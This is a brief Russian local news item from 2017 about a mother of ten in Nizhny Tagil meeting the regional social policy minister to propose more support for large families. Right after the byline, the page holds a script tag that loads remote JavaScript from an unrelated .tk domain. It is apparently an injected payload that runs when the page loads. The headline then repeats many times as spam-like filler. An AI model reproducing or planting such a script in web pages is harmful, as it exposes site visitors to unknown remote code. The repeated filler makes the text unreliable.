Вы здесь

Тагильчанка встретилась с областным министром соцполитики

26.05.2017 11:23

Вчера областной министр по соцполитике Андрей Злоказов провел в Нижнем Тагиле встречу с матерью десятерых детей Светланой Боговой. На днях во время визита врио губернатора Евгения Куйвышева в Нижний Тагил и проведения встречи с партийной ячейкой «ЕР» и активом граждан, Светлана Богова выступила с предложениями усилить меры поддержки многодетным семьям. Евгений Куйвашев предложил ей лично встретиться с ответственным за эти вопросы министром.
Одним из предложений тагильчанки прозвучало выделение таким категориям граждан спецтранспорта, например автомобиля «Газель», на котором можно было передвигаться всей семьей.
В.Сонин.
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Тагильчанка встретилась с областным министром соцполитики Тагильчанка встретилась с областным министром соцполитики Тагильчанка встретилась с областным министром соцполитики Тагильчанка встретилась с областным министром соцполитики Тагильчанка встретилась с областным министром соцполитики Тагильчанка встретилась с областным министром соцполитики Тагильчанка встретилась с областным министром соцполитики Тагильчанка встретилась с областным министром соцполитики Тагильчанка встретилась с областным министром соцполитики Тагильчанка встретилась с областным министром соцполитики Тагильчанка встретилась с областным министром соцполитики Тагильчанка встретилась с областным министром соцполитики Тагильчанка встретилась с областным министром соцполитики